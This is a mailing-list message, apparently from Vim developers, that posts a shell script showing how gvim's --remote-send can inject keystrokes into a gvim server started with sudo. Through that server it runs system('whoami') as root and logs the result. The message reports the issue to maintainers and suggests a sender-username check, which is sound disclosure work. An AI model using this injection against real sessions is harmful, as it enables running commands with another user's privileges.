> >That is, I think it works this way. Perhaps someone with more detailed
> >knowledge of X server access restrictions can give a better answer.
>
> Actually, you have to explicitly allow the sending of synthetic
> keystrokes to an xterm (the allowSendEvents resource). I don't know,
> but perhaps Vim "needs" to have something similar.
This is the script I did send to Bram and Yakov because I didn't know
its a X issue...
So if you want to try out .
============= script ===========================================================
#!/bin/sh
logfile=$(pwd)/log
echo "logfile is $logfile"
rm $logfile
echo " running xhost: " >> $logfile
xhost 2>&1 >> log
echo " starting gvim server " >> $logfile
sudo gvim --servername SECHOLE --display :0.0 2>&1 >> $logfile
sleep 2;
echo "I'm trying to attack system" >> $logfile
for i in SECHOLE1; do
# open logfile, add text and write it again
gvim --servername $i --remote-send \
":silent exec 'sp $logfile'<cr>"
gvim --servername $i --remote-send \
":silent exec 'normal
Goattacking<space>system<space>succesful,<space>server:<space><c-r>=v:servername<cr><space>whoami?<space><c-r>=system('whoami')<cr>'<cr>"
gvim --servername $i --remote-send \
":silent w|bd!<cr>"
done
echo "quitting gvim as normal user " >> log
for i in SECHOLE1; do
gvim --servername $i --remote-send ":qa!<cr>"
done
cat log
============= end ==============================================================
In case it's a still a vim issue or we don't wont it it would be easy to
add a "accept_remote_orders_from_different_user and let vim send not
only the command but also the username so the server might check..
I'll try to investigate some more time to get to know wether it's as
easy as this to find a running shell and send some keys to it.
Marc
